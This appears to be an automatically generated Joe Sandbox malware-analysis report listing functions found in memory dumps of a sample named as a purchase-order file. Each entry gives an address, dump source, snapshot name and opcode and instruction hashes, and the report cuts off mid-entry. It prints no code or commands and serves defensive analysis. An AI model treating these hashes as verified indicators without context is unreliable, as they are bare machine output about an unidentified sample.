Function 00D2F7A0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a9172a23a645adc6c3a91ff7d6eb6d3f5b29ba447710809feeee2119ba9ab9
Instruction ID: 65c6b01562219ac9f5c36d3bcc339933c3a3ccbe01757125a91026605d7713b2
Opcode Fuzzy Hash: f5a9172a23a645adc6c3a91ff7d6eb6d3f5b29ba447710809feeee2119ba9ab9
Instruction Fuzzy Hash: 01E0E574E04208EFCB80DFA9D444A9CBBF4EB49704F1084EAD81893360D6309E40DF50

Function 0584BF88 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0e75bc5d5aad1c02612e87c0541bbb99fd43aa3f5eccbae5494311bf47b00b
Instruction ID: a6f4249d54a43ab2582b65c151a49f856d83c46e03dddce82541d46118b2843c
Opcode Fuzzy Hash: ab0e75bc5d5aad1c02612e87c0541bbb99fd43aa3f5eccbae5494311bf47b00b
Instruction Fuzzy Hash: 3AE0C274E04208AFCB44DFA9D844AACBBF5EB88204F10C0AA9C19D3340D6319E42CF40

Function 0584A1E2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d9aafd6b73ea8d724dfb29cd19c70bf08497d23c94197a59bf9ea90d5ea5a8
Instruction ID: c5b5e42651b1c1c3597c1820a1cd5c2f331bf1c896e00822f7243efa9dacd5c2
Opcode Fuzzy Hash: 62d9aafd6b73ea8d724dfb29cd19c70bf08497d23c94197a59bf9ea90d5ea5a8
Instruction Fuzzy Hash: 04E09274C59248AFD700DFB4E44579CBFB9A705100F208099DD44D3250FB300A40DF50

Function 0584CA60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0e75bc5d5aad1c02612e87c0541bbb99fd43aa3f5eccbae5494311bf47b00b
Instruction ID: 767f2e0e555c19cea1466028d01d3b53d8f9325bee0948b2a454e7cd0f05edbb
Opcode Fuzzy Hash: ab0e75bc5d5aad1c02612e87c0541bbb99fd43aa3f5eccbae5494311bf47b00b
Instruction Fuzzy Hash: 41E0C274E15208AFCB84DFA9D8406ACBBF9AB49204F1081AA9C19D3340D6319E42CF80

Function 05B07C18 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660c5cdf5012872f58a319f5047e4ccef53df0ba3387efa7a5a6467e30ea7052
Instruction ID: c8e63f9e3035db0bbd5983a614c2f12d4cae42d1fd29a8280b224cf9f7eae09e
Opcode Fuzzy Hash: 660c5cdf5012872f58a319f5047e4ccef53df0ba3387efa7a5a6467e30ea7052
Instruction Fuzzy Hash: D7E0E570D4820CEFCB54DFA9D44069DFBB5FB59310F10C1AAA805A2390DB356A50DF90

Function 05B006A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d679b53a4be4fa08a6e3bf6ef6016e9746ca25c8541aed8f78ac5918e3ae6f
Instruction ID: 391ff8c7e84954f1d8cea2b8e62aaa19984d0711c6c6071428bf06a24b7ac38f
Opcode Fuzzy Hash: e3d679b53a4be4fa08a6e3bf6ef6016e9746ca25c8541aed8f78ac5918e3ae6f
Instruction Fuzzy Hash: F3E0C974D05208EFC744EFA9D444AACBBF5EB88204F10C0E9981993390D631AA42CF41

Function 05B07010 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d679b53a4be4fa08a6e3bf6ef6016e9746ca25c8541aed8f78ac5918e3ae6f
Instruction ID: f2c245db7fb3473fee3b17d79b395456caa56b8d0457cf2a23d7d309a7c8e684
Opcode Fuzzy Hash: e3d679b53a4be4fa08a6e3bf6ef6016e9746ca25c8541aed8f78ac5918e3ae6f
Instruction Fuzzy Hash: C6E0ED74D04208EFC744DFA9D44069DFBF5FB48200F10C1EA981993381DA316A42CF40

Function 05CA8EF8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 667f1688dddd265ce445448af94758ed7c04d56c3d837b679fe17b073e111fce
Instruction ID: 8ff76411ca195f09c406c127d4650e326fa294b9db12aa0cfeb4185715ad9484
Opcode Fuzzy Hash: 667f1688dddd265ce445448af94758ed7c04d56c3d837b679fe17b073e111fce
Instruction Fuzzy Hash: A8E0E574E04209EFCB44DFA9D8406ACFBF5EB48304F10C4AA9919D3341D6319E42CF40

Function 0584A5C8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd21e212a65280512bf889f1048c141d9bf3d63ab01ce594681297d3c674602
Instruction ID: fa7e299a4caf7062b1d85f4e904e39a0019d3142c6b19ff7e605550251c00079
Opcode Fuzzy Hash: fcd21e212a65280512bf889f1048c141d9bf3d63ab01ce594681297d3c674602
Instruction Fuzzy Hash: D7E01A3494420CEFCB44DF95D9459ADBBBABB09311F108099ED055B360C7319E50DF50

Function 0584D4D8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69fb9c63860657044200e71d7de0245c3334bd734b2dd461199e72a6d61d2931
Instruction ID: 3c9f163e3167d590074c8284651c19b389ff44b455e3a70f52a4cda7818bd3fd
Opcode Fuzzy Hash: 69fb9c63860657044200e71d7de0245c3334bd734b2dd461199e72a6d61d2931
Instruction Fuzzy Hash: 8BE09275A01204DFCB00CF24E945749B7B1EB41304F24C699E8088F255E732AE07DB85

Function 0584A178 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9025514e6c9c4d25c6d2c13cdaf6d2941383091f45457a9e539123c68e659d
Instruction ID: 4ff55b983766bd9a9445b0dc4622e68fd69a12a851eaa4305f6c6c5b4586d9c7
Opcode Fuzzy Hash: 1a9025514e6c9c4d25c6d2c13cdaf6d2941383091f45457a9e539123c68e659d
Instruction Fuzzy Hash: 0AE01A74D0420CEFCB58EFA9D40069CBBBAEB44304F5084AADC19A7340D7345A41CF50

Function 05B07DF8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef476ddb3ffa7fcc9cb22d86a333bb5c52b33bfa0ef8207d4d1fc50641639221
Instruction ID: 293646fc01cc17ce72ae04422965fc8d87aa695a8be917f76b8281af070f57c7
Opcode Fuzzy Hash: ef476ddb3ffa7fcc9cb22d86a333bb5c52b33bfa0ef8207d4d1fc50641639221
Instruction Fuzzy Hash: A9E086B1A4A2449BD344CFA4C950BBEBF7CEB46302F00A0D99941531D1C7346D93EF61

Function 05B07CEA Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af63fd3841b44a830ff121d644d2e06df416c402e5c53f7e8912f0f28647e3b
Instruction ID: 80389a6eb135961ca72be91fe4ebd219fa7138cace2296e673ff17c906fdf6dc
Opcode Fuzzy Hash: 5af63fd3841b44a830ff121d644d2e06df416c402e5c53f7e8912f0f28647e3b
Instruction Fuzzy Hash: FCE0DFB1604208EBCB05DFA0D805AADBB76FB01301F1098E9E801121A0C7366A52EF40

Function 05B0D478 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d516a41533010553e4c929acedec51fd2e0141c37d5e62d1231b896a66c6a2ef
Instruction ID: 4858b7ad1190db103f29e7db5224697268fa4d315f613bc6cf9943e89d937e25
Opcode Fuzzy Hash: d516a41533010553e4c929acedec51fd2e0141c37d5e62d1231b896a66c6a2ef
Instruction Fuzzy Hash: C4E0E574908208BFCB44DF99D880AACFBB9EB49200F14C0EA985957391DA31AA52DF94

Function 05B09448 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad5fd1b8d3264b95a6b3cab9576f02405c4bc3260321012cab880267e874fc6
Instruction ID: ccda6d90006c2c279b6f73a25fdaa71522a5aa0404cbb58fec2375314ba62710
Opcode Fuzzy Hash: 3ad5fd1b8d3264b95a6b3cab9576f02405c4bc3260321012cab880267e874fc6
Instruction Fuzzy Hash: 1EE06D311841459FC7A0CBACC944BA8BFE1EF46214F1442D9C9999B2E3C6316942CB41

Function 05B087C2 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219f4b430c6dfb0f98df724d04fd56b4716bf7cddba7f18956074c880205e794
Instruction ID: caa6435fd37870bc00417ce82d8d45cf2603d040d08b1050159e4d52e2af92f9
Opcode Fuzzy Hash: 219f4b430c6dfb0f98df724d04fd56b4716bf7cddba7f18956074c880205e794
Instruction Fuzzy Hash: 06E08675688155DBC304CBD8C910668BF61EB5A215F1592D9981D5B3D6C6329E03CB41

Function 05B0C072 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b97f5faf515ce9247653eceab951309645bfd132624c2f2abccbd039cc86a2b
Instruction ID: a45321d639efd0c2e0bf25fb4dace4aedc6ed41ef77e850d14aee1d24701cdfa
Opcode Fuzzy Hash: 2b97f5faf515ce9247653eceab951309645bfd132624c2f2abccbd039cc86a2b
Instruction Fuzzy Hash: 3DF0ED70908258CFCB11CF28D810B89BBB4FF0A300F0041DAE499A7282CB384E88CF50

Function 05B01298 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b806e7235931cb73ac4ae1500bbecfd4004def8ca07827062bd47d752c78f30
Instruction ID: f2e9cf37034867f403fd1173e272793a93cd2fbebb50afc67cb610141d72282f
Opcode Fuzzy Hash: 8b806e7235931cb73ac4ae1500bbecfd4004def8ca07827062bd47d752c78f30
Instruction Fuzzy Hash: 9FE09230609148DFC704EF98DD44BACBFB5AF42304F1080DEC94457286CA316A56CB40

Function 05CAE9F8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06272cd312168d1680c6095049cbe3490c50ad4fc73efa5115f64384e20f598f
Instruction ID: e5d413256f8d767de92c3b419d867e80db819a7ee144191addd67b8220edad57
Opcode Fuzzy Hash: 06272cd312168d1680c6095049cbe3490c50ad4fc73efa5115f64384e20f598f
Instruction Fuzzy Hash: 83E08675908208EBC704DF99D84096DFFBDBB45304F10C0A9D94567385CB319E42EBA4

Function 05B18961 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fefee0260edcce9bdd0250307c07a874610db5d421ca9120922f7712cdb36a81
Instruction ID: 193d1498d3c7db9f1d133a54b334143fd2523a1c6b5937b42e212a92754de1c6
Opcode Fuzzy Hash: fefee0260edcce9bdd0250307c07a874610db5d421ca9120922f7712cdb36a81
Instruction Fuzzy Hash: 2EE0D8325183864FC702E72DD8467807FB0FF47200F0959D9D4C5CA15BC734A5479B54

Function 0584B4A8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e92c8c65b4751ae894f76a5d12be47b6033f051f692b5c09a17ec35e6849ea4
Instruction ID: 667c8bc442429c74466368e998d78016acee489b5a040d63b8884d3c844f5dd5
Opcode Fuzzy Hash: 6e92c8c65b4751ae894f76a5d12be47b6033f051f692b5c09a17ec35e6849ea4
Instruction Fuzzy Hash: 1DE04F3090420CEFCB44DFA8C94065CBBF4AB09205F1080A98C0DD3381D6319E41CF40

Function 0584AE02 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa4a9d4200077c06ee173feadd91968bda582f0251b0590a6ded479023c05f3
Instruction ID: 7eca7347e1243f5b0e1d55a87b2e62d47ad9e78289be97ce5b10faad7f635f73
Opcode Fuzzy Hash: afa4a9d4200077c06ee173feadd91968bda582f0251b0590a6ded479023c05f3
Instruction Fuzzy Hash: 41F0FE70905318CFDB54EF68D844B98BBB1FB09715F1441EAE409A7359CE305E89CF25

Function 058431F7 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94277e6c8608c9f7e61524e259f19c73ddd4f7680f40a87e36093cae58afe0b3
Instruction ID: f600323a69b542079f4b5fca5d2cee7f7328cc9a0b713c1fcfc04c83d6f9c0b9
Opcode Fuzzy Hash: 94277e6c8608c9f7e61524e259f19c73ddd4f7680f40a87e36093cae58afe0b3
Instruction Fuzzy Hash: 71F07474D10218DFDB10DF59E445F99BBB2BB08314F5445A9E819A3221CB359D85DF41

Function 05B0DDA8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6521df064ee902eda4cfb6309d05ecc18102d807d0342e8d81b7fdd57057fc
Instruction ID: b276a51538a0adcd47f4b2182d38af63259e1adbd2a4f571545c0513150dba56
Opcode Fuzzy Hash: 5e6521df064ee902eda4cfb6309d05ecc18102d807d0342e8d81b7fdd57057fc
Instruction Fuzzy Hash: E7E09A7460C284AFC701CF90D8515A9BFB5EB42300F24A4DAC846532E2CB352986CF01

Function 05B07CF8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e89dad146e7b54babddf13274bb4b4581492f9c9c34be0f32ae9c779da06a66e
Instruction ID: 1b6c5033813b46d0d79e573dc9ab8fc24592c00d75e7a9e4cdb551389cc3e596
Opcode Fuzzy Hash: e89dad146e7b54babddf13274bb4b4581492f9c9c34be0f32ae9c779da06a66e
Instruction Fuzzy Hash: CCE0867084520CFBCB04DFA4D801AACBF79FB45301F1085A9E805222A0CB316A51EB50

Function 05B09458 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e654b6b5c89c8ea4fa5d432a3ce0a553b18f2ab02700be5e99dbc1533eb8dea
Instruction ID: 68fa6009cfaec4ac0d00b077461ea92297d4d66f91ff4a44de1bc988b2737f59
Opcode Fuzzy Hash: 7e654b6b5c89c8ea4fa5d432a3ce0a553b18f2ab02700be5e99dbc1533eb8dea
Instruction Fuzzy Hash: 58E0867090420CEFC784DFE8C84066CFBF5EB08204F1080E98849D3391D731AE41CB40

Function 05B07FD0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 150c44c682eb3e3e85a159cd52c784bc86284b040f7dec5c9f171967f6026f1f
Instruction ID: 7d4947c7788f6b60b800fdd7488be74c338224ff86f5258e7e7c8f0550fdf91f
Opcode Fuzzy Hash: 150c44c682eb3e3e85a159cd52c784bc86284b040f7dec5c9f171967f6026f1f
Instruction Fuzzy Hash: E7E08CB5B0C2849FC741CF94C8909B9BB79EF82304F14A0DAD80A57296CF366D87CB81

Function 05B07E08 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf65149da61786286bf231b7bd345df710cc956a09480420155a92a2a3474d6c
Instruction ID: aaee5ef16ab6961e809129b8267b2d3faf07bd3ed7c5ea0a2e8d14c2f5c25915
Opcode Fuzzy Hash: bf65149da61786286bf231b7bd345df710cc956a09480420155a92a2a3474d6c
Instruction Fuzzy Hash: 9CE01D71849148ABC704DFA5D900ABDFFBDE745301F5091D5950553294CA306E51DB65

Function 05CA7B00 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba2b996f761bf473f54c7b6276a87858be11a1511457e5c22bc3cda9e6a23b7
Instruction ID: d68ebbac54cb10151a642d02b70d9c3800ef189eab1d05db95e072a4494df6ad
Opcode Fuzzy Hash: 0ba2b996f761bf473f54c7b6276a87858be11a1511457e5c22bc3cda9e6a23b7
Instruction Fuzzy Hash: A8E01A74D08208ABCB04DF99D4406ACFBF5EB49204F1084EA981953381D6715A42DF40

Function 05B1FB20 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 824341c03fea7721082de52a1c2dc7d192f3f14ab634613f2d6c41c11b88239c
Instruction ID: 22405167e709ffd7a66f8ff05562fbeef9298d269a4e185f61be1d70e784b2c2
Opcode Fuzzy Hash: 824341c03fea7721082de52a1c2dc7d192f3f14ab634613f2d6c41c11b88239c
Instruction Fuzzy Hash: 20E0DF32A58B900FD34583A8AC243953F949B86322F54828ADD488A1E2EB291C0AC7C6

Function 0584A1F0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c3ee39624ca5a9138807f2ee53d816908fc5429fc81e63908bff91cb3e5800
Instruction ID: 2a82aecae578b02fc6289cb53bb3a0a436f1831c92062cb8358a7c43762515fd
Opcode Fuzzy Hash: e1c3ee39624ca5a9138807f2ee53d816908fc5429fc81e63908bff91cb3e5800
Instruction Fuzzy Hash: 98E0EC7095921CEFCB44DFA8D84569CBBB9AB05201F1080A99D09D3290FB315E84DF55

Function 0584A91B Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7834219ea374fc9088f31e849f2d8f4eefc9e10068447280c2aae12aeeb1b8c
Instruction ID: ae53b333c8ab64d2ee8bf6d464a8952c05eb0fa6b27250119c2719dc33e83cfc
Opcode Fuzzy Hash: e7834219ea374fc9088f31e849f2d8f4eefc9e10068447280c2aae12aeeb1b8c
Instruction Fuzzy Hash: 1DF0987084022ECFDB64DF24D945BADBBB1EB45305F5054F9E819A6A11EB315D81DF10

Function 05B0DDB8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: 4e8be4fb9dbc24ecc3a3392085644de2687e65fcba193e0d8c2a1b6f8b39fd67
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: D9E0EC74908208EBCB04DFD4E941A6CBFB9EB46314F1091D99809673D5CA316E52DB95

Function 05B02D50 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: db12c646b77199f7fb548ceeb681183e05badbcae19c9020ada5fde2fc7a7bf9
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: C0E01238908208EFC714DF94E949A6CFBB9EB45304F1091D9D80967391CB316E47DB95

Function 05B02438 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: 5feb93f6f2bbb322fba707bee76913a3d13ae7c0d877a67ef6fadc0b850580ef
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: 50E0C238908208EBCB04DF94D84496CFBB9EB45300F1090EDCD0913381CB316E47DB80

Function 05B00C60 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

